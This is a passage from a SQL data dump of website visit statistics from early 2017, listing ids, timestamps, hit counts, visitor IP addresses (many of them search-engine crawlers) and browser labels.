),(85831,1485658879,3,3,0,0,'146.185.152.81','other'),(85832,1485659997,1,0,1,0,'66.249.64.27',''),(85833,1485660042,2,0,2,0,'66.249.64.21',''),(85834,1485662219,1,1,0,0,'180.76.15.23','other'),(85835,1485662241,1,1,0,0,'93.158.152.51','other'),(85836,1485662289,1,1,0,0,'141.8.142.25','other'),(85837,1485662333,1,1,0,0,'141.8.142.155','other'),(85838,1485662344,1,0,1,0,'66.249.64.27',''),(85839,1485664644,1,1,0,0,'130.193.50.38','other'),(85840,1485664835,2,0,2,0,'66.249.64.24',''),(85841,1485665183,1,0,1,0,'66.249.64.21',''),(85842,1485665724,1,0,1,0,'66.249.64.27',''),(85843,1485666439,1,0,1,0,'66.249.64.21',''),(85844,1485667255,1,0,1,0,'66.249.64.24',''),(85845,1485667830,1,1,0,0,'5.255.253.9','other'),(85846,1485667833,1,1,0,0,'93.158.152.9','other'),(85847,1485667879,1,0,1,0,'66.249.64.21',''),(85848,1485669235,1,1,0,0,'141.8.183.25','other'),(85849,1485669362,1,1,0,0,'207.46.13.70','other'),(85850,1485669421,1,0,1,0,'66.249.64.24',''),(85851,1485670323,1,0,1,0,'66.249.64.27',''),(85852,1485671669,4,0,4,0,'66.249.64.21',''),(85853,1485671845,1,1,0,0,'130.193.50.34','other'),(85854,1485672124,1,1,0,0,'178.137.83.166','chrome'),(85855,1485672656,1,1,0,0,'141.8.142.175','other'),(85856,1485673308,1,1,0,0,'130.193.50.34','other'),(85857,1485674058,3,0,3,0,'66.249.64.24',''),(85858,1485674481,1,1,0,0,'93.158.152.40','other'),(85859,1485674919,1,1,0,0,'91.196.178.33','chrome'),(85860,1485674931,1,1,0,0,'66.249.93.156','chrome'),(85861,1485675435,3,0,3,0,'66.249.64.27',''),(85862,1485675584,1,0,1,0,'66.249.64.21',''),(85863,1485675614,1,0,1,0,'66.249.64.79',''),(85864,1485676139,1,0,1,0,'66.249.64.24',''),(85865,1485676192,1,1,0,0,'130.193.51.19','other'),(85866,1485676244,1,1,0,0,'141.8.142.175','other'),(85867,1485676251,1,1,0,0,'141.8.142.61','other'),(85868,1485677087,1,1,0,0,'91.196.178.33','chrome'),(85869,1485677094,1,1,0,0,'178.154.149.10','other'),(85870,1485677098,1,1,0,0,'130.193.50.6','other'),(85871,1485677306,1,0,1,0,'66.249.64.27',''),(85872,1485678004,1,0,1,0,'66.249.64.21',''),(85873,1485678161,1,1,0,0,'207.46.13.5','other'),(85874,1485679425,1,0,1,0,'66.249.64.79',''),(85875,1485679493,2,0,2,0,'66.249.64.21',''),(85876,1485679781,2,0,2,0,'66.249.64.24',''),(85877,1485679948,2,0,2,0,'66.249.64.27',''),(85878,1485681667,1,1,0,0,'194.135.16.44','chrome'),(85879,1485681928,1,0,1,0,'66.249.64.69',''),(85880,1485682481,61,61,0,0,'88.198.16.153','other'),(85881,1485682688,1,1,0,0,'5.255.253.53','other'),(85882,1485682888,2,0,2,0,'66.249.64.27',''),(85883,1485682994,1,0,1,0,'66.249.64.74',''),(85884,1485683068,1,1,0,0,'5.255.253.9','other'),(85885,1485684461,2,0,2,0,'66.249.64.79',''),(85886,1485684576,1,1,0,0,'91.196.178.71','other'),(85887,1485685079,1,0,1,0,'66.249.64.74',''),(85888,1485685540,1,1,0,0,'130.193.50.34','other'),(85889,1485686473,1,1,0,0,'130.193.50.6','other'),(85890,1485686489,1,0,1,0,'66.249.64.21',''),(85891,1485686773,1,1,0,0,'141.8.142.206','other'),(85892,1485687049,1,1,0,0,'5.255.253.47','other'),(85893,1485687430,1,1,0,0,'141.8.142.58','other'),(85894,1485687606,1,1,0,0,'93.180.64.220','other'),(85895,1485687636,1,1,0,0,'130.193.51.74','other'),(85896,1485687735,1,1,0,0,'130.193.50.34','other'),(85897,1485687970,1,0,1,0,'66.249.64.24',''),(85898,1485688440,1,1,0,0,'141.8.142.67','other'),(85899,1485688444,1,1,0,0,'141.8.183.19','other'),(85900,1485688486,1,1,0,0,'130.193.51.19','other'),(85901,1485688664,1,1,0,0,'93.158.152.84','other'),(85902,1485688936,1,1,0,0,'141.8.132.10','other'),(85903,1485689038,1,1,0,0,'5.255.253.36','other'),(85904,1485689041,1,1,0,0,'5.255.253.26','other'),(85905,1485689106,1,0,1,0,'66.249.64.74',''),(85906,1485689811,1,1,0,0,'141.8.183.25','other'),(85907,1485690059,1,1,0,0,'93.158.152.84','other'),(85908,1485690456,1,0,1,0,'66.249.64.24',''),(85909,1485691178,1,1,0,0,'130.193.50.6','other'),(85910,1485691222,1,1,0,0,'130.193.50.34','other'),(85911,1485692456,2,2,0,0,'141.8.142.61','other'),(85912,1485692490,1,1,0,0,'141.8.142.58','other'),(85913,1485692999,2,2,0,0,'141.8.142.25','other'),(85914,1485693338,1,1,0,0,'130.193.51.74','other'),(85915,1485693887,1,1,0,0,'141.8.142.58','other'),(85916,1485694036,1,1,0,0,'5.255.253.68','other'),(85917,1485695000,1,1,0,0,'141.8.142.175','other'),(85918,1485695498,1,0,1,0,'66.249.64.27',''),(85919,1485695686,1,1,0,0,'130.193.51.19','other'),(85920,1485695830,1,1,0,0,'141.8.142.58','other'),(85921,1485696669,1,1,0,0,'130.193.50.4','other'),(85922,1485696698,1,1,0,0,'130.193.50.34','other'),(85923,1485696908,3,3,0,0,'141.8.142.175','other'),(85924,1485697959,1,1,0,0,'141.8.142.175','other'),(85925,1485697962,1,1,0,0,'141.8.142.58','other'),(85926,1485698267,1,0,1,0,'66.249.64.24',''),(85927,1485698948,4,4,0,0,'141.8.183.25','other'),(85928,1485698958,3,0,3,0,'66.249.64.27',''),(85929,1485700817,1,1,0,0,'130.193.50.34','other'),(85930,1485701081,1,1,0,0,'141.8.142.58','other'),(85931,1485701093,2,2,0,0,'130.193.51.19','other'),(85932,1485702538,1,1,0,0,'141.8.142.175','other'),(85933,1485702580,1,1,0,0,'207.46.13.70','other'),(85934,1485702630,2,2,0,0,'130.193.51.19','other'),(85935,1485703077,1,1,0,0,'93.158.152.40','other'),(85936,1485703079,2,2,0,0,'141.8.183.25','other'),(85937,1485703719,1,1,0,0,'141.8.142.175','other'),(85938,1485703796,1,1,0,0,'207.46.13.70','other'),(85939,1485705338,1,0,1,0,'66.249.64.24',''),(85940,1485705651,1,1,0,0,'130.193.50.6','other'),(85941,1485705652,1,0,1,0,'66.249.65.62',''),(85942,1485707825,1,0,1,0,'66.249.64.21',''),(85943,1485709421,1,0,1,0,'66.249.64.24',''),(85944,1485709810,1,1,0,0,'207.46.13.5','other'),(85945,1485711675,1,1,0,0,'66.249.75.28','chrome'),(85946,1485711782,1,1,0,0,'66.249.69.187','chrome'),(85947,1485711886,1,1,0,0,'95.133.145.164','chrome'),(85948,1485712382,1,1,0,0,'141.8.132.52','other'),(85949,1485712435,2,0,2,0,'66.249.69.189',''),(85950,1485712649,1,1,0,0,'178.154.149.11','other'),(85951,1485712665,1,0,1,0,'66.249.69.185',''),(85952,1485712940,1,1,0,0,'207.46.13.5','other'),(85953,1485714111,1,1,0,0,'5.255.253.53','other'),(85954,1485714290,1,1,0,0,'180.76.15.20','other'),(85955,1485715542,1,1,0,0,'141.8.142.167','other'),(85956,1485715785,1,1,0,0,'5.255.253.53','other'),(85957,1485716530,1,1,0,0,'93.158.152.75','other'),(85958,1485717063,1,0,1,0,'66.249.69.189',''),(85959,1485718022,1,0,1,0,'66.249.75.25',''),(85960,1485718688,1,1,0,0,'141.8.142.78','other'),(85961,1485718691,1,1,0,0,'130.193.50.34','other'),(85962,1485720372,1,1,0,0,'141.0.13.1','other'),(85963,1485721070,1,1,0,0,'66.249.75.22','chrome'),(85964,1485722161,1,1,0,0,'178.137.83.166','chrome'),(85965,1485722489,1,1,0,0,'141.8.183.25','other'),(85966,1485722933,1,1,0,0,'130.193.50.6','other'),(85967,1485723879,1,1,0,0,'91.196.178.69','chrome'),(85968,1485724513,1,1,0,0,'141.8.184.11','other'),(85969,1485725047,1,1,0,0,'176.36.230.102','chrome'),(85970,1485725932,1,1,0,0,'95.132.133.187','chrome'),(85971,1485726189,1,1,0,0,'5.255.253.67','other'),(85972,1485727719,1,1,0,0,'141.8.142.10','other'),(85973,1485728260,1,1,0,0,'141.8.142.167','other'),(85974,1485728475,3,3,0,0,'46.4.27.199','other'),(85975,1485729954,1,1,0,0,'66.249.75.25','chrome'),(85976,1485730631,1,1,0,0,'141.8.142.62','other'),(85977,1485730775,1,1,0,0,'207.46.13.5','other'),(85978,1485733420,1,1,0,0,'5.255.253.53','other'),(85979,1485733722,1,1,0,0,'141.8.142.25','other'),(85980,1485735133,1,1,0,0,'141.8.183.25','other'),(85981,1485735472,1,0,1,0,'68.180.229.254',''),(85982,1485736667,1,1,0,0,'180.76.15.148','other'),(85983,1485737120,1,1,0,0,'5.255.253.68','other'),(85984,1485737406,1,1,0,0,'141.8.142.61','other'),(85985,1485737414,1,1,0,0,'93.158.152.84','other'),(85986,1485740220,1,1,0,0,'93.158.152.84','other'),(85987,1485740289,1,1,0,0,'141.8.142.61','other'),(85988,1485740824,2,1,1,0,'66.249.69.185',''),(85989,1485741123,1,1,0,0,'66.249.75.25','chrome'),(85990,1485745873,1,1,0,0,'141.8.183.25','other'),(85991,1485746463,1,1,0,0,'66.249.69.187','chrome'),(85992,1485747021,1,1,0,0,'207.46.13.212','other'),(85993,1485747049,1,1,0,0,'141.8.142.61','other'),(85994,1485748100,1,1,0,0,'207.46.13.5','other'),(85995,1485749656,1,1,0,0,'46.229.168.75','other'),(85996,1485749714,2,2,0,0,'46.229.168.69','other'),(85997,1485749996,1,1,0,0,'130.193.51.19','other'),(85998,1485752034,1,1,0,0,'141.8.142.175','other'),(85999,1485755350,1,1,0,0,'91.196.178.70','firefox'),(86000,1485756187,1,1,0,0,'180.76.15.158','other'),(86001,1485756400,1,1,0,0,'91.196.178.100','chrome'),(86002,1485757461,1,1,0,0,'91.196.178.72','chrome'),(86003,1485758814,1,1,0,0,'66.249.93.89','chrome'),(86004,1485759097,1,1,0,0,'130.193.51.19','other'),(86005,1485759499,1,1,0,0,'91.124.55.123','chrome'),(86006,1485759759,1,1,0,0,'185.26.180.163','other'),(86007,1485759847,1,1,0,0,'91.196.178.66','chrome'),(86008,1485761088,1,1,0,0,'95.134.39.134','chrome'),(86009,1485761232,1,0,1,0,'66.249.75.25',''),(86010,1485761913,1,0,1,0,'66.249.69.189',''),(86011,1485762322,1,1,0,0,'141.8.142.175','other'),(86012,1485762345,1,1,0,0,'95.134.219.172','chrome'),(86013,1485762413,4,4,0,0,'62.210.251.247','other'),(86014,1485762732,1,1,0,0,'93.74.212.147','firefox'),(86015,1485763329,1,1,0,0,'93.158.152.51','other'),(86016,1485763622,1,1,0,0,'66.249.75.22','chrome'),(86017,1485764142,1,1,0,0,'130.180.220.247','firefox'),(86018,1485764226,1,1,0,0,'180.76.15.134','other'),(86019,1485764572,1,1,0,0,'94.179.147.66','firefox'),(86020,1485764722,1,1,0,0,'130.193.51.19','other'),(86021,1485764773,4,4,0,0,'144.76.39.34','other'),(86022,1485765198,1,1,0,0,'37.52.25.201','chrome'),(86023,1485766162,1,1,0,0,'37.52.25.201','chrome'),(86024,1485766217,1,1,0,0,'141.8.142.58','other'),(86025,1485766218,1,1,0,0,'141.8.142.61','other'),(86026,1485766523,3,3,0,0,'141.8.142.175','other'),(86027,1485766812,1,1,0,0,'37.25.113.128','chrome'),(86028,1485767667,1,1,0,0,'130.193.50.34','other'),(86029,1485767771,1,0,1,0,'66.249.75.22',''),(86030,1485767917,1,1,0,0,'37.25.113.128','firefox'),(86031,1485767968,1,1,0,0,'91.196.178.132','chrome'),(86032,1485768461,1,1,0,0,'141.8.142.175','other'),(86033,1485768707,1,1,0,0,'91.196.178.135','firefox'),(86034,1485768736,1,1,0,0,'91.196.178.65','firefox'),(86035,1485768762,1,1,0,0,'91.196.178.65','chrome'),(86036,1485768963,1,1,0,0,'46.200.29.236','chrome'),(86037,1485769286,1,1,0,0,'91.196.178.71','chrome'),(86038,1485769886,1,1,0,0,'94.179.147.66','firefox'),(86039,1485771227,1,1,0,0,'91.196.177.26','chrome'),(86040,1485772292,1,1,0,0,'91.196.178.71','chrome'),(86041,1485772670,1,1,0,0,'91.196.178.72','chrome'),(86042,1485772794,1,1,0,0,'94.158.95.5','chrome'),(86043,1485772984,1,1,0,0,'91.196.178.135','firefox'),(86044,1485773720,1,1,0,0,'176.111.33.18','firefox'),(86045,1485774604,1,1,0,0,'141.8.142.175','other'),(86046,1485775551,1,1,0,0,'91.196.178.168','chrome'),(86047,1485775602,1,1,0,0,'130.193.50.34','other'),(86048,1485777580,3,3,0,0,'192.187.104.235','other'),(86049,1485777963,1,1,0,0,'91.196.178.102','chrome'),(86050,1485778556,1,1,0,0,'192.162.234.106','chrome'),(86051,1485778887,1,1,0,0,'92.113.53.3','chrome'),(86052,1485779305,1,1,0,0,'130.193.50.34','other'),(86053,1485780590,2,2,0,0,'141.8.142.175','other'),(86054,1485780924,1,0,1,0,'66.249.69.189',''),(86055,1485781076,1,1,0,0,'91.196.178.68','firefox'),(86056,1485781286,1,1,0,0,'91.196.178.72','other'),(86057,1485781617,1,1,0,0,'91.196.178.71','chrome'),(86058,1485781685,1,1,0,0,'176.122.109.73','chrome'),(86059,1485782148,1,1,0,0,'91.196.178.168','chrome'),(86060,1485782354,1,1,0,0,'178.92.84.174','chrome'),(86061,1485783080,1,1,0,0,'91.196.177.26','chrome'),(86062,1485783337,1,1,0,0,'141.8.183.19','other'),(86063,1485783555,1,1,0,0,'91.196.178.65','chrome'),(86064,1485783721,1,1,0,0,'95.132.9.43','chrome'),(86065,1485783734,1,1,0,0,'130.193.50.34','other'),(86066,1485784318,1,1,0,0,'141.8.183.25','other'),(86067,1485784460,1,1,0,0,'37.53.224.49','chrome'),(86068,1485784733,1,1,0,0,'91.201.247.146','firefox'),(86069,1485785006,1,1,0,0,'141.8.142.58','other'),(86070,1485785509,1,1,0,0,'94.179.51.127','chrome'),(86071,1485785644,1,1,0,0,'176.98.70.103','chrome'),(86072,1485786153,1,0,1,0,'66.249.75.22',''),(86073,1485786837,1,1,0,0,'176.111.33.18','firefox'),(86074,1485786897,1,1,0,0,'91.196.178.167','chrome'),(86075,1485786941,1,1,0,0,'141.8.142.61','other'),(86076,1485787951,1,1,0,0,'66.102.9.59','chrome'),(86077,1485788212,1,1,0,0,'91.196.178.72','chrome'),(86078,1485788318,1,1,0,0,'194.44.130.236','chrome'),(86079,1485788572,1,1,0,0,'91.196.178.65','firefox'),(86080,1485790390,1,1,0,0,'130.180.218.169','chrome'),(86081,1485790519,1,1,0,0,'95.132.116.151','firefox'),(86082,1485790575,1,1,0,0,'91.196.178.68','firefox'),(86083,1485790691,1,1,0,0,'141.8.142.175','other'),(86084,1485790767,1,1,0,0,'94.179.71.50','firefox'),(86085,1485790924,1,1,0,0,'180.76.15.138','other'),(86086,1485790942,1,1,0,0,'94.179.72.158','firefox'),(86087,1485791456,1,1,0,0,'37.25.113.128','chrome'),(86088,1485791729,1,1,0,0,'94.178.7.185','chrome'),(86089,1485792746,1,1,0,0,'94.179.77.129','firefox'),(86090,1485792875,1,0,1,0,'66.249.69.187',''),(86091,1485793440,1,1,0,0,'141.8.183.25','other'),(86092,1485793899,1,0,1,0,'66.249.69.187',''),(86093,1485793933,1,1,0,0,'141.8.142.175','other'),(86094,1485794466,1,1,0,0,'194.187.216.11','firefox'),(86095,1485794937,1,1,0,0,'141.8.142.58','other'),(86096,1485796216,1,1,0,0,'130.193.50.34','other'),(86097,1485796404,2,0,2,0,'66.249.75.22',''),(86098,1485796846,1,0,1,0,'68.180.229.62',''),(86099,1485796921,1,1,0,0,'91.196.178.65','other'),(86100,1485797458,1,0,1,0,'66.249.75.28',''),(86101,1485797703,1,1,0,0,'130.193.51.19','other'),(86102,1485797708,1,1,0,0,'141.8.183.25','other'),(86103,1485797717,1,1,0,0,'141.8.142.175','other'),(86104,1485797721,1,1,0,0,'130.193.50.34','other'),(86105,1485798600,1,0,1,0,'66.249.69.185',''),(86106,1485798846,1,1,0,0,'130.193.50.34','other'),(86107,1485798849,1,1,0,0,'141.8.142.175','other'),(86108,1485799332,1,1,0,0,'130.180.216.54','chrome'),(86109,1485800216,1,1,0,0,'130.193.51.19','other'),(86110,1485800997,1,1,0,0,'141.8.142.175','other'),(86111,1485802443,1,1,0,0,'130.193.50.34','other'),(86112,1485803822,1,0,1,0,'66.249.75.28',''),(86113,1485803851,1,1,0,0,'95.69.229.167','chrome'),(86114,1485804423,1,1,0,0,'91.196.178.39','chrome'),(86115,1485804464,1,0,1,0,'66.249.69.187',''),(86116,1485805755,1,1,0,0,'91.196.178.39','chrome'),(86117,1485805793,1,1,0,0,'46.211.248.2','chrome'),(86118,1485807014,1,1,0,0,'130.193.50.34','other'),(86119,1485808833,1,1,0,0,'141.8.183.25','other'),(86120,1485809780,1,1,0,0,'141.8.183.25','other'),(86121,1485810370,1,1,0,0,'130.193.50.34','other'),(86122,1485810455,1,1,0,0,'178.92.1.233','chrome'),(86123,1485810543,1,0,1,0,'66.249.75.28',''),(86124,1485810762,1,1,0,0,'8.37.233.36','other'),(86125,1485810887,1,1,0,0,'93.74.77.99','other'),(86126,1485812009,1,1,0,0,'130.193.50.34','other'),(86127,1485814990,1,1,0,0,'130.193.50.34','other'),(86128,1485815119,1,1,0,0,'141.8.142.175','other'),(86129,1485815732,1,1,0,0,'141.8.142.206','other'),(86130,1485816285,2,2,0,0,'130.193.50.34','other'),(86131,1485816505,2,2,0,0,'141.8.142.175','other'),(86132,1485816867,2,2,0,0,'141.8.183.25','other'),(86133,1485818187,1,1,0,0,'130.193.51.19','other'),(86134,1485818366,1,1,0,0,'141.8.183.25','other'),(86135,1485818390,1,1,0,0,'141.8.142.175','other'),(86136,1485819470,1,1,0,0,'141.8.184.11','other'),(86137,1485819589,1,1,0,0,'141.8.142.175','other'),(86138,1485820312,1,1,0,0,'207.46.13.70','other'),(86139,1485820364,1,1,0,0,'141.8.183.25','other'),(86140,1485823457,1,1,0,0,'141.8.142.58','other'),(86141,1485823483,2,2,0,0,'130.193.51.19','other'),(86142,1485823807,2,2,0,0,'130.193.50.34','other'),(86143,1485824640,1,0,1,0,'66.249.69.185',''),(86144,1485824874,1,1,0,0,'95.134.203.233','chrome'),(86145,1485825659,1,1,0,0,'180.76.15.6','other'),(86146,1485826713,1,1,0,0,'141.8.142.175','other'),(86147,1485827725,3,3,0,0,'130.193.50.34','other'),(86148,1485828101,1,1,0,0,'141.8.142.175','other'),(86149,1485830133,1,1,0,0,'130.193.51.19','other'),(86150,1485830217,1,1,0,0,'141.8.132.10','other'),(86151,1485832318,1,1,0,0,'5.228.20.121','chrome'),(86152,1485832769,1,1,0,0,'141.8.183.25','other'),(86153,1485833108,1,1,0,0,'188.32.229.218','chrome'),(86154,1485833460,2,2,0,0,'130.193.50.34','other'),(86155,1485834684,1,1,0,0,'157.55.39.61','other'),(86156,1485834982,1,1,0,0,'130.193.50.34','other'),(86157,1485835591,1,1,0,0,'93.158.152.84','other'),(86158,1485836084,1,1,0,0,'188.32.184.61','firefox'),(86159,1485836474,2,2,0,0,'141.8.183.25','other'),(86160,1485836478,1,1,0,0,'130.193.50.6','other'),(86161,1485836482,1,1,0,0,'141.8.142.58','other'),(86162,1485836767,1,1,0,0,'130.193.50.34','other'),(86163,1485837308,1,1,0,0,'163.172.64.216','other'),(86164,1485837320,1,1,0,0,'163.172.64.179','other'),(86165,1485837558,1,1,0,0,'163.172.64.243','other'),(86166,1485838237,1,1,0,0,'130.193.51.19','other'),(86167,1485838275,1,1,0,0,'163.172.64.222','other'),(86168,1485838287,1,1,0,0,'130.193.50.34','other'),(86169,1485839021,1,1,0,0,'141.8.142.175','other'),(86170,1485840752,2,2,0,0,'141.8.142.175','other'),(86171,1485841292,1,1,0,0,'163.172.64.245','other'),(86172,1485841533,1,1,0,0,'91.196.178.68','firefox'),(86173,1485843060,1,1,0,0,'91.196.178.70','firefox'),(86174,1485843441,1,0,1,0,'66.249.69.185',''),(86175,1485844112,1,1,0,0,'5.255.253.54','other'),(86176,1485844459,2,0,2,0,'66.249.69.189',''),(86177,1485844991,1,1,0,0,'66.249.93.89','chrome'),(86178,1485845029,1,1,0,0,'109.63.137.178','opera'),(86179,1485845928,3,3,0,0,'91.196.178.72','chrome'),(86180,1485845986,1,1,0,0,'91.124.19.7','chrome'),(86181,1485847469,2,2,0,0,'192.151.145.82','other'),(86182,1485847862,1,1,0,0,'94.179.43.109','firefox'),(86183,1485848191,1,1,0,0,'37.53.224.49','chrome'),(86184,1485848411,1,1,0,0,'163.172.71.225','other'),(86185,1485848536,1,1,0,0,'37.55.38.151','chrome'),(86186,1485849057,1,1,0,0,'37.53.123.71','firefox'),(86187,1485849066,1,1,0,0,'163.172.64.246','other'),(86188,1485849414,1,1,0,0,'91.196.178.66','firefox'),(86189,1485850107,1,1,0,0,'207.46.13.70','other'),(86190,1485850610,1,1,0,0,'37.53.123.71','firefox'),(86191,1485850975,1,1,0,0,'157.55.39.137','other'),(86192,1485851142,1,1,0,0,'37.25.113.128','msie'),(86193,1485852957,1,1,0,0,'180.76.15.10','other'),(86194,1485853250,2,2,0,0,'157.55.39.220','other'),(86195,1485853489,1,1,0,0,'91.196.177.26','chrome'),(86196,1485853792,1,1,0,0,'130.180.216.91','firefox'),(86197,1485853962,1,1,0,0,'163.172.64.217','other'),(86198,1485854171,1,1,0,0,'157.55.39.137','other'),(86199,1485854839,1,1,0,0,'207.46.13.70','other'),(86200,1485854900,1,1,0,0,'157.55.39.61','other'),(86201,1485855135,2,2,0,0,'69.30.198.186','other'),(86202,1485855384,1,0,1,0,'66.249.75.25',''),(86203,1485855757,1,0,1,0,'66.249.75.28',''),(86204,1485855781,1,1,0,0,'91.207.245.150','firefox'),(86205,1485856410,1,1,0,0,'91.196.178.72','chrome'),(86206,1485857102,1,1,0,0,'141.8.142.175','other'),(86207,1485857220,1,1,0,0,'91.196.178.100','chrome'),(86208,1485858410,1,0,1,0,'66.249.69.185',''),(86209,1485858429,1,1,0,0,'91.196.122.203','chrome'),(86210,1485859123,1,1,0,0,'163.172.64.224','other'),(86211,1485859397,1,1,0,0,'91.196.177.46','chrome'),(86212,1485859855,1,1,0,0,'91.237.121.34','chrome'),(86213,1485861193,1,1,0,0,'91.196.178.68','firefox'),(86214,1485861597,1,1,0,0,'91.196.177.26','chrome'),(86215,1485862020,1,1,0,0,'157.55.39.220','other'),(86216,1485862656,1,1,0,0,'91.196.178.131','firefox'),(86217,1485863512,1,1,0,0,'91.196.178.66','chrome'),(86218,1485864188,1,0,1,0,'66.249.75.25',''),(86219,1485864702,1,1,0,0,'157.55.39.220','other'),(86220,1485864781,1,1,0,0,'91.196.178.165','chrome'),(86221,1485865033,1,1,0,0,'37.52.23.154','chrome'),(86222,1485865592,1,1,0,0,'157.55.39.61','other'),(86223,1485865840,1,0,1,0,'66.249.75.22',''),(86224,1485866057,1,1,0,0,'37.52.23.154','chrome'),(86225,1485866258,1,0,1,0,'66.249.69.187',''),(86226,1485866341,1,1,0,0,'91.196.178.35','firefox'),(86227,1485866638,1,1,0,0,'95.132.95.13','chrome'),(86228,1485867032,3,3,0,0,'5.255.253.54','other'),(86229,1485867033,2,2,0,0,'141.8.142.152','other'),(86230,1485868035,1,1,0,0,'130.193.50.34','other'),(86231,1485868262,1,1,0,0,'176.195.121.45','chrome'),(86232,1485868333,1,1,0,0,'180.76.15.24','other'),(86233,1485868371,1,0,1,0,'66.249.69.189',''),(86234,1485868948,1,1,0,0,'66.249.75.28','chrome'),(86235,1485869773,1,1,0,0,'91.196.178.72','chrome'),(86236,1485869860,1,1,0,0,'37.53.123.71','firefox'),(86237,1485870002,1,1,0,0,'77.90.193.98','chrome'),(86238,1485870300,1,1,0,0,'46.201.240.112','firefox'),(86239,1485870310,1,1,0,0,'93.158.152.40','other'),(86240,1485870314,1,1,0,0,'141.8.142.206','other'),(86241,1485870468,2,1,1,0,'66.249.75.25',''),(86242,1485870471,1,1,0,0,'66.249.75.22','chrome'),(86243,1485871129,1,1,0,0,'91.196.178.72','firefox'),(86244,1485871823,2,2,0,0,'130.193.50.34','other'),(86245,1485872009,1,1,0,0,'91.196.178.68','firefox'),(86246,1485873341,1,0,1,0,'66.249.75.22',''),(86247,1485874130,1,1,0,0,'141.8.142.175','other'),(86248,1485874167,1,1,0,0,'91.124.181.8','chrome'),(86249,1485874809,1,1,0,0,'141.8.183.25','other'),(86250,1485874820,1,1,0,0,'46.201.223.77','chrome'),(86251,1485875123,1,1,0,0,'91.196.177.46','firefox'),(86252,1485875353,1,1,0,0,'157.55.39.137','other'),(86253,1485875521,1,1,0,0,'66.249.75.22','chrome'),(86254,1485875703,1,1,0,0,'91.196.178.66','chrome'),(86255,1485875771,1,1,0,0,'31.41.70.11','chrome'),(86256,1485875884,1,1,0,0,'130.193.51.19','other'),(86257,1485876514,1,0,1,0,'66.249.75.22',''),(86258,1485876991,1,1,0,0,'193.194.127.217','firefox'),(86259,1485878509,1,1,0,0,'93.183.197.28','chrome'),(86260,1485878628,1,1,0,0,'95.132.133.155','chrome'),(86261,1485879356,1,1,0,0,'91.196.178.37','chrome'),(86262,1485879873,1,1,0,0,'82.145.223.81','other'),(86263,1485880611,1,1,0,0,'141.8.142.175','other'),(86264,1485881289,2,1,1,0,'66.249.64.57',''),(86265,1485882716,2,2,0,0,'82.145.220.221','other'),(86266,1485883178,1,1,0,0,'176.195.102.28','msie'),(86267,1485883260,1,1,0,0,'95.133.153.247','chrome'),(86268,1485884240,1,1,0,0,'66.249.64.61','chrome'),(86269,1485884916,1,1,0,0,'95.133.153.247','chrome'),(86270,1485885133,1,1,0,0,'5.255.253.37','other'),(86271,1485885137,1,1,0,0,'141.8.132.49','other'),(86272,1485885141,1,1,0,0,'5.255.253.23','other'),(86273,1485885145,1,1,0,0,'141.8.142.170','other'),(86274,1485885148,1,1,0,0,'141.8.142.152','other'),(86275,1485885294,1,1,0,0,'66.249.64.183','chrome'),(86276,1485885598,1,1,0,0,'5.83.17.159','firefox'),(86277,1485886878,1,1,0,0,'141.8.142.61','other'),(86278,1485886885,1,1,0,0,'141.8.142.67','other'),(86279,1485886894,3,3,0,0,'141.8.183.25','other'),(86280,1485886907,3,3,0,0,'130.193.50.34','other'),(86281,1485886938,2,2,0,0,'141.8.142.175','other'),(86282,1485888184,1,1,0,0,'94.179.50.57','firefox'),(86283,1485888807,1,0,1,0,'66.249.64.187',''),(86284,1485888882,1,1,0,0,'91.196.178.103','chrome'),(86285,1485889880,1,1,0,0,'46.211.252.94','chrome'),(86286,1485890446,1,1,0,0,'82.145.222.219','other'),(86287,1485892013,1,1,0,0,'176.195.99.143','msie'),(86288,1485892950,1,1,0,0,'207.46.13.70','other'),(86289,1485892955,1,1,0,0,'163.172.64.180','other'),(86290,1485893220,1,1,0,0,'162.210.196.130','other'),(86291,1485901625,1,1,0,0,'180.76.15.134','other'),(86292,1485904372,1,1,0,0,'141.8.142.175','other'),(86293,1485906011,2,2,0,0,'130.193.50.34','other'),(86294,1485906026,3,3,0,0,'141.8.142.61','other'),(86295,1485906055,1,1,0,0,'130.193.51.19','other'),(86296,1485906063,1,1,0,0,'141.8.142.85','other'),(86297,1485906067,1,1,0,0,'141.8.132.10','other'),(86298,1485906082,1,1,0,0,'141.8.142.67','other'),(86299,1485906086,1,1,0,0,'141.8.142.58','other'),(86300,1485906174,1,1,0,0,'207.46.13.70','other'),(86301,1485906411,1,1,0,0,'64.246.165.160','firefox'),(86302,1485908443,1,1,0,0,'130.193.50.34','other'),(86303,1485908685,1,0,1,0,'68.180.229.62',''),(86304,1485909688,1,0,1,0,'66.249.64.179',''),(86305,1485910278,1,1,0,0,'176.193.97.26','msie'),(86306,1485911234,1,1,0,0,'163.172.64.245','other'),(86307,1485911660,1,0,1,0,'66.249.64.57',''),(86308,1485913371,1,0,1,0,'68.180.228.230',''),(86309,1485915898,1,1,0,0,'66.249.64.59','chrome'),(86310,1485917708,1,1,0,0,'66.249.64.187','chrome'),(86311,1485920060,2,2,0,0,'91.121.97.49','other'),(86312,1485920103,1,1,0,0,'66.249.64.57','chrome'),(86313,1485922991,1,0,1,0,'66.249.64.183',''),(86314,1485924499,1,0,1,0,'66.249.64.179',''),(86315,1485925420,1,1,0,0,'51.15.43.223','other'),(86316,1485926597,1,1,0,0,'180.76.15.147','other'),(86317,1485928526,1,0,1,0,'66.249.64.179',''),(86318,1485928603,1,1,0,0,'91.196.178.70','firefox'),(86319,1485929806,1,1,0,0,'66.249.93.155','chrome'),(86320,1485931506,1,1,0,0,'91.124.37.226','chrome'),(86321,1485931610,1,1,0,0,'37.52.23.154','chrome'),(86322,1485931958,1,1,0,0,'91.196.178.66','firefox'),(86323,1485931999,1,1,0,0,'92.112.249.143','chrome'),(86324,1485932021,1,1,0,0,'130.193.50.34','other'),(86325,1485932130,1,1,0,0,'178.95.247.28','chrome'),(86326,1485932635,1,1,0,0,'37.52.23.154','chrome'),(86327,1485933394,1,1,0,0,'37.53.123.71','chrome'),(86328,1485935135,1,1,0,0,'82.207.91.234','firefox'),(86329,1485935146,1,1,0,0,'91.196.177.15','chrome'),(86330,1485935460,1,1,0,0,'95.134.221.73','chrome'),(86331,1485935960,1,1,0,0,'95.135.127.122','chrome'),(86332,1485936957,1,1,0,0,'130.180.217.147','firefox'),(86333,1485937519,1,1,0,0,'91.201.180.38','chrome'),(86334,1485937699,3,3,0,0,'213.133.111.165','other'),(86335,1485939686,1,0,1,0,'66.249.64.179',''),(86336,1485940839,1,1,0,0,'130.193.50.34','other'),(86337,1485941914,1,1,0,0,'91.124.55.252','chrome'),(86338,1485943348,1,1,0,0,'91.196.178.164','chrome'),(86339,1485943930,1,1,0,0,'66.